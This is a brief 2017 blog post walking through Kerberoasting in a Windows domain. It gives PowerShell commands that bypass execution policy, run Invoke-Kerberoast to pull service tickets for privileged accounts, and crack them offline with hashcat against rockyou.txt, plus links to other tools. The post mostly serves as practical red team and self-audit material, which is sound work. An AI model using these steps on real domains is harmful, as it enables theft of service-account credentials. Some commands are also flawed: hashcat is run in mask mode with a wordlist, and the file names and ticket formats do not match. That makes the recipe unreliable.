Monday, May 15, 2017

Springtime Kerberoasting

After getting some motivation from recent talks I attended I have decided to do some Kerberoasting in our Windows domain.

There are lots of excellent articles out there such as Harmj0y’s article. In there you can find a bunch of references to other good and original articles on the subject.
The reason I’m writing this blog post is that there are lots of tools out there and some require specific versions of John the Ripper and so on so I decided to document one path that I have taken here.

First, on a domain joined Windows computer run the following script by Harmj0y:
https://gist.github.com/HarmJ0y/53a837fce877e32e18d78acbb08c8fe9

powershell -exec bypass

# Load the script
. ./Invoke-Kerberoast.ps1

# Do a test run to see 
# that it's working
Invoke-Kerberoast | fl 

# Get the tickets in John
# format and convert to CSV format
Invoke-Kerberoast -AdminCount -OutputFormat john | ConvertTo-Csv -NoTypeInformation | out-file kerbe
roasts.csv

The next step is to start cracking the tickets in Kirbi format that we obtained. We can use either John The Ripper or Hashcat. I decided on Hashcat as this can make use of the GPU with oclHashcat.

hashcat -a3 -m 13100 service_tickets_hashcat.txt rockyou.txt
hashcat -a3 -m 13100 service_tickets_hashcat.txt --show

Another option for doing this on a red team engagement is to use Powershell Empire’s module for it powershell/credentials/invoke-kerberoast.

Other tools and resources

https://github.com/nidem/kerberoast
https://room362.com/post/2016/kerberoast-pt1/
http://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/

No comments :

Post a Comment